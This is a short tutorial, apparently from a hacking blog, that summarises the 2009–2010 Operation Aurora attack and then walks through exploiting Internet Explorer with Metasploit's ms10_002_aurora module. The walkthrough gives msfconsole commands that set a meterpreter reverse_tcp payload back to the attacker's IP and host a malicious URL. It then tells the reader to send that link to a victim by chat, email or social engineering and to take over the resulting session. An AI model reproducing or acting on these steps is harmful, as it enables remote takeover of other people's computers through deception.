Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo,Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.
Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
Operating System: Windows vista, windows 7, windows server 2008
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms10_002_aurora
Msf exploit (ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (ms10_002_aurora)>set uripath meeting (The Url to use for this exploit)
Msf exploit (ms10_002_aurora)>exploit
Now an URL you should give to your victim http://192.168.1.4:8080/meeting
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“